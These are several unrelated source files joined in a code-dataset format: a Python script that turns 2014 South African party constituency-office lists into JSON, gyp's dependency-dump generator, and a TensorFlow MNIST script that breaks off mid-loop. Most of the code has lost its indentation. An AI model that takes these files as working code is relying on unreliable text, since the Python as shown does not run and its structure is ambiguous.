'Cnr Geriet & Marietz Streets, No 5 Old Cnr Geriet & Marietz Streets, No 5 Old': 'Gerrit Maritz St Zeerust 2865',
'NY1, FAWO Building, Gugulethu, 7750': 'Gugulethu, 7750',
'18 Vryburg Road, Molopo, Tosca, 8618': 'Tosca, North West, South Africa',
'0ffice no 8,Khula Ntuli Building,Kwaggafontein,0458': 'Khula Ntuli Building Kwaggafontein,0458',
'Lohatla': 'Postmasburg',
'Shop no 22 GHL .Building Main Street Mkhuze 3965': 'Main Street Mkhuze 3965',
'Engen Garage, Vleischboom, 1658': 'Makhuduthamaga Local Municipality',
'Room 19 Balebogeng Centre, Tsoeu Street, Mamelodi West, 0122': 'Mamelodi West, Pretoria 0122',
'Shop 4, Indian Centre, Amalia Road, Shop 4, Indian Centre, Amalia Road,': 'Mamusa Local Municipality Schweizer-Reneke 2780',
'No.1 Mapela Stand, Metsotamia, Mapela, 0610': 'Mapela, Limpopo 0610',
'Stand No.22294, Mohlalaotwane Village, Ga-Rakgodi, 1068': 'Marblehall, Limpopo',
'1117 Farm 1, Superintendent Buildng, Mathabe Street, Mbibane, 0449': 'Mbibane, 0449',
'OGS Building Centre, Room 141, Corner Street, 4th Avenue Town Centre, 7785': 'Mitchell\'s Plain, 7785',
'Corner Gelead and Knobel Road, Ceres Moletjie, 0774': 'Moletji village, Limpopo 0774',
'Stand No 4065, Mathibestad, 0404': 'Moretele ,Mathibestad Str,Hammanskraal 0404',
'Shop No.2, Mphiwe Family Complex, 1360': 'Mphiwe Family Trust Complex Main Road, Acornhoek 1360',
'D 254, Solomon Section, Main Road Mpuluzi, 2335': 'Mpuluzi, 2335, Mpumalanga South Africa',
'Mabogo General Dealer, No 40, Ha Ravele, next to Ravele Bar Lounge and Nengovhela, Tshilwavhusiku,0920': 'Nengovhela Tshilwavhusiku, Limpopo 0920',
'Stand 408 A, Ngwenyeni Main Road, KaMaqhekeza, 1346': 'Nkomazi, Mpumalanga, 1346',
'PE Northern Areas': 'Salt Lake, Port Elizabeth',
'Valoyi Traditional Authority Trust, Runnymead Trading Centre, Nwamitwa, 0871': 'Nwamitwa, 0871, Limpopo South Africa',
'Ipelegeng Com. Centre, Cnr Phera & Khumalo White City Jabavu, 1868': 'Phera & Khumalo White City Jabavu, 1868',
'597 Block H, Sekhing Village, near SASA Offices, 8566': 'Sekhing, Greater Taung Sekhing 8566',
'Matsamo Lake Beneficiary Building,Shongwe Mission,1331': 'Shongwe Mission, 1331',
'Shop No.1, Smiling Park, Mamotintane, next to the Stadium, Houtbos, Mankweng': 'Smiling Park Mankweng, Limpopo South Africa',
'Oakley Trust, Stand 626, Mathibela Traditional Authority': 'Stand 620, Zone 1, Mankweng Polkwane 0727',
'Pretelis Building, 6 Tambotie Street, Phalaborwa, 1398': 'Tambotie Street, Phalaborwa, 1398, Limpopo South Africa',
'93 Lesedi Building, Main Road, Taung Station, 8580': 'Taung Station, North West 8580',
'The Oaks Village Next to the Community Hall , 1390': 'The Oaks Village Next to the Community Hall , 1390',
'Stand No 12 Far East, Tonga Road, Kwalugedlane, 1341': 'Tonga, Kwalugedlane, Komatipooort, 1341',
'Sotobe Car Wash Premises, Tugela Ferry Main Rod opposite Msinga Municipality, Msinga, 3010': 'Tugela Ferry Rd, 3010',
'Room 102 Union Rd Counsel Offices, Evaton, 2845': 'Union Rd, Evaton 2845',
'No 09 Victoria Street, Build It Building, 2745': 'Victoria Rd Mahikeng 2745',
'1375 The Village Mall, Stand No.1375, Elukwatini, 1192': 'village mall Elukwatini, 1192 City of Mpumalanga',
'Shop No. 19, Kliptown Taxi Rank, Walter Sisulu Square, Kliptown, 1811': 'Walter Sisulu Square, Kliptown, Soweto 1811',
'7450 Zwelitsha Street, Zone 1Diepkloof, 1864': 'Zone 1, Diepkloof, 1864 ',
'11 Black Seed Centre, 2134 Zwane Street, Mbalentle, 2285': 'Zwane Street, Mbalentle, 2285',
'No. 3 Setlagole Shopping Complex, Vryburg Road (N18), Setlagole Village, 2772': 'Vryburg Road, Ratlou, 2772',
'53 Parakiet Street, Pescodia, Kimberly, 8309': '53 Parakiet Street, Kimberly, 8309',
'Deep South': 'Fish Hoek',
'45 main Street, Kirkwood, 6120': 'Kirkwood',
'4 Thirteen Street Delaray, Roodepoort, 1724': 'No. 4 13th Street Delaray'
}
def process_anc_province(text, province):
source_urls = {
'Eastern Cape': 'http://sourceafrica.net/documents/15394-anc-constituency-offices-eastern-cape-2014.html',
'Free State': 'http://sourceafrica.net/documents/15395-anc-constituency-offices-free-state-2014.html',
'Gauteng': 'http://sourceafrica.net/documents/15396-anc-constituency-offices-gauteng-2014.html',
'Kwazulu Natal': 'http://sourceafrica.net/documents/15397-anc-constituency-offices-kwazulu-natal-2014.html',
'Limpopo': 'http://sourceafrica.net/documents/15398-anc-constituency-offices-limpopo-2014.html',
'Mpumalanga': 'http://sourceafrica.net/documents/15399-anc-constituency-offices-mpumalanga-2014.html',
'North West': 'http://sourceafrica.net/documents/15400-anc-constituency-offices-north-west-2014.html',
'Northern Cape': 'http://sourceafrica.net/documents/15401-anc-constituency-offices-northern-cape-2014.html',
'Western Cape': 'http://sourceafrica.net/documents/15402-anc-constituency-offices-western-cape-2014.html'
}
source_url = source_urls[province]
source_note = 'ANC %s Constituency List 2014' % (province)
correct_title = {
'ATLANTIS, MAMRE, PELLA,SURROUNDING FARMS': 'ATLANTIS, MAMRE, PELLA, SURROUNDING FARMS',
'SENWABARWANA(BLOUBERG)': 'SENWABARWANA (BLOUBERG)'
}
offices = []
title_pattern = " *([0-9]*)\.?\W*PCO CODE\W*([0-9]+) *([A-Za-z0-9,()/' ]+)"
fields = [
'MP',
'Cell',
'Administrator',
'Physical Address',
'Tel No',
'Tel',
'Fax No',
'Fax',
'E-mail',
'Email',
'Ward',
'Municipality',
'Region',
'Postal Address',
'Volunteer',
'MPL',
'Physical address',
'Postal address',
'Telefax',
'Telfax',
'Faxemail',
'Wards',
'Physical & Postal Address',
'Tell',
'ADSL',
'Caucus Cell Phone'
]
match_fields = ' *(?P<field>(' + ')|('.join(fields) + '))\W+(?P<value>.+)'
correct_fields = {
'Email': 'E-mail',
'Telefax': 'Telfax',
'Faxemail': 'Fax',
'Wards': 'Ward',
'Tell': 'Tel',
'Tel No': 'Tel',
'Fax No': 'Fax',
}
add_office = None
previous_field = None
set_next_cell = True
for line in text.split("\n"):
match_title = re.match(title_pattern, line)
if match_title:
#new office
if add_office:
if 'Physical Address' in add_office:
corrected = manual_location_corrections.get(
add_office['Physical Address'],
None)
if corrected:
add_office['Location'] = corrected
offices.append(add_office)
add_office = None
title = match_title.group(3)
title = title.replace('(to be relocated)', '')
title = title.replace('(RELOCATED)', '')
title = title.replace('(Office Is Relocating)', '')
title = title.strip()
title = correct_title.get(title, title)
title = title.title()
title = title.replace("'S", "'s")
pco_code = match_title.group(2)
add_office = {
'Title': 'ANC Constituency Office (%s): %s' % (pco_code, title),
'Province': province,
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'ANC'
}
add_office['People'] = []
if pco_code != '000':
add_office['identifiers'] = {
'constituency-office/ANC/': pco_code
}
elif add_office:
match_field = re.match(match_fields, line)
if match_field:
field = match_field.group('field').strip().title()
value = match_field.group('value').strip()
field = correct_fields.get(field, field)
value = value.replace(u'Â', '')
value = value.replace(u' ', ' ')
value = value.replace(u'–', '-')
value = value.replace(u'–', '-')
prev = ['Physical Address', 'Postal Address', 'Ward']
notin = ['Postal Address', 'Tel', 'Fax', 'E-mail', 'Ward', 'Municipality', 'Region']
if field in ['Mp', 'Mpl']:
if 'Awaiting deployment' in value:
set_next_cell = False
continue
name = value
name = re.sub('-? ?(Deputy )?(Minister|NCOP)', '', name)
name = name.replace('Hon ', '')
name = name.replace('Dr ', '')
name = name.replace('Dep-Min. ', '')
name = name.replace('Min. ', '')
name = name.replace(' (Provincial)', '')
name = name.replace(' (NEC member)', '')
name = re.sub(
'-? ?\(? ?(Province to National) ?\)?',
'',
name
)
name = re.sub(
'–?-? NEC Deployee( &| and)?( Deputy)?( Minister)?',
'',
name
)
name = name.strip()
original_name = name
name = manual_name_corrections.get(name, name)
set_next_cell = True
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
add_office['People'].append(person_to_append)
elif field == 'Volunteer':
add_office['People'].append({
'Name': value.replace(',', ''),
'Position': 'Volunteer'
})
elif field == 'Administrator':
name = value
name = manual_name_corrections.get(name, name)
name = name.replace(',', '').replace('/', '').strip()
position = 'Administrator'
#ignore vacancies
if 'Vacant' in name:
set_next_cell = False
continue
#correctly label volunteer administrators
if '(Volunteer)' in value:
name = name.replace('(Volunteer)', '').strip()
position = 'Administrator (volunteer)'
set_next_cell = True
add_office['People'].append({
'Name': name,
'Position': position
})
elif field == 'Cell':
#cell is only recorded with the previous person
if len(add_office['People']) > 0 and set_next_cell:
#remove odd unicode characters in cell numbers
value = re.sub('\W', ' ', value)
person_index = len(add_office['People'])-1
add_office['People'][person_index][field] = value
elif field == 'Physical & Postal Address':
#split combined field into two
add_office['Postal Address'] = value
add_office['Physical Address'] = value
elif field == 'Telfax':
#split combined field into two
add_office['Tel'] = value
add_office['Fax'] = value
else:
#field for the office/area
add_office[field] = value
previous_field = field
#handle combined fields that span more than one line
elif previous_field == 'Physical & Postal Address':
add_office['Postal Address'] = add_office['Postal Address'] + ' ' + value
add_office['Physical Address'] = add_office['Physical Address'] + ' ' +value
#handle fields that span more than one line
elif previous_field in prev and not line.strip() in notin:
add_office[previous_field] = add_office[previous_field] + ' ' + line.strip()
elif line.strip() != '':
print 'Unmatched line:', line
if 'Physical Address' in add_office:
corrected = manual_location_corrections.get(add_office['Physical Address'], None)
if corrected:
add_office['Location'] = corrected
offices.append(add_office)
return offices
def process_da_areas(csv_file):
areas = {}
source_url = 'http://sourceafrica.net/documents/15403-da-constituency-areas-2014.html'
source_note = 'DA Constituency List 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[2].strip() in areas:
#area already exists - just add the person
original_name = row[1]
name = manual_name_corrections.get(row[1], row[1])
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'}
if name != original_name:
person_to_append['Alternative Name'] = original_name
areas[row[2].strip()]['People'].append(person_to_append)
else:
#add new area
original_name = row[1]
name = manual_name_corrections.get(row[1], row[1])
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'}
if name != original_name:
person_to_append['Alternative Name'] = original_name
areas[row[2].strip()] = {
'Title': row[2].strip(),
'People': [
person_to_append
],
'Description': row[5],
'Province': row[4],
'Type': 'area',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'DA'
}
if row[3] != '':
areas[row[2].strip()]['Location'] = manual_location_corrections.get(row[3], row[3])
return areas.values()
def process_eff_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15405-eff-constituency-offices-2014.html'
source_note = 'EFF Constituency List 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [
person_to_append
],
'Tel': row[5],
'Province': row[2].title(),
'Physical Address': manual_location_corrections.get(row[3], row[3]).title(),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'EFF'
}
if row[4] != '':
administrator_to_append = {
'Name': row[4].title(),
'Position': 'Administrator'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_aic_offices(csv_file):
offices_to_add = {}
source_url_1 = 'http://sourceafrica.net/documents/15404-aic-constituencies-offices-2014.html'
source_note_1 = 'AIC Constituency List 2014'
source_url_2 = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note_2 = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Sources': [
{
'Source URL': source_url_1,
'Source Note': source_note_1
},
{
'Source URL': source_url_2,
'Source Note': source_note_2
},
],
'Party': 'AIC'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
if row[9] != '':
administrator_to_append = {
'Name': row[9],
'Position': 'Coordinator'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
if row[10] != '':
administrator_to_append = {
'Name': row[10],
'Position': 'Community Development Field Worker'
}
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_acdp_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'ACDP'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_ff_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'FF'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_apc_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'APC'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
def process_udm_offices(csv_file):
offices_to_add = {}
source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
source_note = 'Constituency data collected by PMG 2014'
with open(csv_file, 'rb') as csvfile:
rows = csv.reader(csvfile)
first_row = True
for row in rows:
if first_row:
first_row = False
continue
if row[0].strip() in offices_to_add:
#office exists - just add person
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()]['People'].append(person_to_append)
else:
#add new office
name = re.sub('Mr?s?.? ', '', row[1].strip().title())
name = re.sub('\ADr.? ', '', name).strip()
original_name = name
name = manual_name_corrections.get(name, name)
person_to_append = {
'Name': name,
'Position': 'Constituency Contact'
}
if name != original_name:
person_to_append['Alternative Name'] = original_name
if row[2] != '':
person_to_append['Cell'] = row[2]
if row[3] != '':
person_to_append['Email'] = row[3]
offices_to_add[row[0].strip()] = {
'Title': row[0].strip(),
'People': [],
'Tel': row[6],
'Fax': row[7],
'Province': row[5],
'Physical Address': manual_location_corrections.get(row[4], row[4]),
'Type': 'office',
'Source URL': source_url,
'Source Note': source_note,
'Party': 'UDM'
}
if name != '':
offices_to_add[row[0].strip()]['People'].append(person_to_append)
if row[8] != '':
administrator_to_append = {
'Name': row[8],
'Position': 'Administrator'
}
if row[9] != '':
administrator_to_append['Cell'] = row[9]
offices_to_add[row[0].strip()]['People'].append(administrator_to_append)
return offices_to_add.values()
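# The per-party CSV processors above share the same parsing logic and differ
# only in the hard-coded 'Party' value. A single parameterized helper along the
# following lines could replace them. This is an illustrative sketch only: the
# name process_party_offices is hypothetical, it is not called by the pipeline
# below, it reuses the module-level csv/re imports and the
# manual_name_corrections / manual_location_corrections dicts defined earlier,
# and it skips empty contact names in both branches (a minor normalisation of
# the original edge-case behaviour).
def process_party_offices(csv_file, party):
    offices_to_add = {}
    source_url = 'http://sourceafrica.net/documents/15406-pmg-sourced-constituency-office-data.html'
    source_note = 'Constituency data collected by PMG 2014'
    with open(csv_file, 'rb') as csvfile:
        rows = csv.reader(csvfile)
        next(rows)  # skip the header row
        for row in rows:
            title = row[0].strip()
            # Strip courtesy titles and apply manual corrections to the name
            name = re.sub('Mr?s?.? ', '', row[1].strip().title())
            name = re.sub('\ADr.? ', '', name).strip()
            original_name = name
            name = manual_name_corrections.get(name, name)
            person = {'Name': name, 'Position': 'Constituency Contact'}
            if name != original_name:
                person['Alternative Name'] = original_name
            if row[2] != '':
                person['Cell'] = row[2]
            if row[3] != '':
                person['Email'] = row[3]
            if title not in offices_to_add:
                # First time we see this office: create it and attach the
                # administrator, mirroring the original new-office branch.
                offices_to_add[title] = {
                    'Title': title,
                    'People': [],
                    'Tel': row[6],
                    'Fax': row[7],
                    'Province': row[5],
                    'Physical Address': manual_location_corrections.get(row[4], row[4]),
                    'Type': 'office',
                    'Source URL': source_url,
                    'Source Note': source_note,
                    'Party': party
                }
                if row[8] != '':
                    administrator = {'Name': row[8], 'Position': 'Administrator'}
                    if row[9] != '':
                        administrator['Cell'] = row[9]
                    offices_to_add[title]['People'].append(administrator)
            if name != '':
                offices_to_add[title]['People'].append(person)
    return offices_to_add.values()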
ensure_executable_found("antiword")
provinces = [
'Eastern Cape',
'Free State',
'Gauteng',
'Kwazulu Natal',
'Limpopo',
'Mpumalanga',
'North West',
'Northern Cape',
'Western Cape'
]
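# Each ANC province has a .doc contact list; convert it to text with antiword
# and parse the offices out of it with process_anc_province.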
offices = [
office
for province in provinces
for office in process_anc_province(
check_output(
['antiword', '2014/ANC/'+province+'.doc']
).decode('unicode-escape'),
province
)
]
offices += \
process_da_areas('2014/DA_processed.csv') + \
process_eff_offices('2014/EFF_processed.csv') + \
process_aic_offices('2014/AIC_processed.csv') + \
process_acdp_offices('2014/ACDP_processed.csv') + \
process_ff_offices('2014/FFplus_processed.csv') + \
process_apc_offices('2014/APC_processed.csv') + \
process_udm_offices('2014/UDM_processed.csv')
exclude = [
'COPE'
]
json_output = {
'offices': offices,
'exclude': exclude,
'start_date': '2014-05-21',
'end_date': '2014-05-06'}
with open('2014.json', 'w') as output:
json.dump(json_output, output, indent=4)
| agpl-3.0 |
datakid/hh2014-epilepsy | client_src/epilepsy-project/node_modules/ember-cli/node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/generator/dump_dependency_json.py | 899 | 2768 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import os
import gyp
import gyp.common
import gyp.msvs_emulation
import json
import sys
generator_supports_multiple_toolsets = True
generator_wants_static_library_dependencies_adjusted = False
generator_default_variables = {
}
for dirname in ['INTERMEDIATE_DIR', 'SHARED_INTERMEDIATE_DIR', 'PRODUCT_DIR',
'LIB_DIR', 'SHARED_LIB_DIR']:
# Some gyp steps fail if these are empty(!).
generator_default_variables[dirname] = 'dir'
for unused in ['RULE_INPUT_PATH', 'RULE_INPUT_ROOT', 'RULE_INPUT_NAME',
'RULE_INPUT_DIRNAME', 'RULE_INPUT_EXT',
'EXECUTABLE_PREFIX', 'EXECUTABLE_SUFFIX',
'STATIC_LIB_PREFIX', 'STATIC_LIB_SUFFIX',
'SHARED_LIB_PREFIX', 'SHARED_LIB_SUFFIX',
'CONFIGURATION_NAME']:
generator_default_variables[unused] = ''
def CalculateVariables(default_variables, params):
generator_flags = params.get('generator_flags', {})
for key, val in generator_flags.items():
default_variables.setdefault(key, val)
default_variables.setdefault('OS', gyp.common.GetFlavor(params))
flavor = gyp.common.GetFlavor(params)
if flavor == 'win':
# Copy additional generator configuration data from VS, which is shared
# by the Windows Ninja generator.
import gyp.generator.msvs as msvs_generator
generator_additional_non_configuration_keys = getattr(msvs_generator,
'generator_additional_non_configuration_keys', [])
generator_additional_path_sections = getattr(msvs_generator,
'generator_additional_path_sections', [])
gyp.msvs_emulation.CalculateCommonVariables(default_variables, params)
def CalculateGeneratorInputInfo(params):
"""Calculate the generator specific info that gets fed to input (called by
gyp)."""
generator_flags = params.get('generator_flags', {})
if generator_flags.get('adjust_static_libraries', False):
global generator_wants_static_library_dependencies_adjusted
generator_wants_static_library_dependencies_adjusted = True
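# Walk the dependency graph from the requested targets and dump the
# target -> dependencies map to dump.json.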
def GenerateOutput(target_list, target_dicts, data, params):
# Map of target -> list of targets it depends on.
edges = {}
# Queue of targets to visit.
targets_to_visit = target_list[:]
while len(targets_to_visit) > 0:
target = targets_to_visit.pop()
if target in edges:
continue
edges[target] = []
for dep in target_dicts[target].get('dependencies', []):
edges[target].append(dep)
targets_to_visit.append(dep)
filename = 'dump.json'
f = open(filename, 'w')
json.dump(edges, f)
f.close()
print 'Wrote json to %s.' % filename
| mit |
palanglois/augmentedReality | testTensorFlow/MNIST.py | 1 | 3453 | #!/usr/bin/python
#Load matplotlib
import matplotlib.pyplot as plt
plt.style.use('ggplot')
#Loading the mnist data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
#Import tensor flow
import tensorflow as tf
sess = tf.InteractiveSession()
#Allocating sizes for the images
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
#Defining the convolution
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
#Defining the max-pooling
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
### LAYER 1 ###
#Defining the first convolutional layer
W_conv1 = weight_variable([5, 5, 1, 32])
b_conv1 = bias_variable([32])
#Resizing the pictures
x_image = tf.reshape(x, [-1,28,28,1])
#Defining the operations in the first layer
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
### LAYER 2 ###
#Defining the second convolutional layer
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
#Defining the operations in the second layer
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
### LAYER 3 ###
#Defining the third layer which is fully connected
W_fc1 = weight_variable([7 * 7 * 64, 1024])
b_fc1 = bias_variable([1024])
#Defining the operations in the third layer
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
#Performing dropout
keep_prob = tf.placeholder(tf.float32) #Probability of keeping a neuron's output
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
### LAYER 4 ###
#Defining the fourth layer which is just a soft max
W_fc2 = weight_variable([1024, 10])
b_fc2 = bias_variable([10])
#Defining the operations in the fourth layer
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
#Using cross-entropy as a loss function
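#Note: the positional (logits, labels) call below matches the pre-1.0 TensorFlow API;
#TensorFlow 1.0+ expects named arguments, i.e. softmax_cross_entropy_with_logits(labels=y_, logits=y_conv)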
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y_conv, y_))
#Defining the learning rate
learningRate = 1e-4
#Training
train_step = tf.train.AdamOptimizer(learningRate).minimize(cross_entropy)
#Determining the number of correct predictions
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
#Averaging the number of correct predictions
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
#Performing the initialization in the back-end
sess.run(tf.global_variables_initializer())
#Doing 2000 training steps and recording the loss at each step
iterations = []
for i in range(2000):
batch = mnist.train.next_batch(50)
train_accuracy = accuracy.eval(feed_dict={
x:batch[0], y_: batch[1], keep_prob: 1.0})
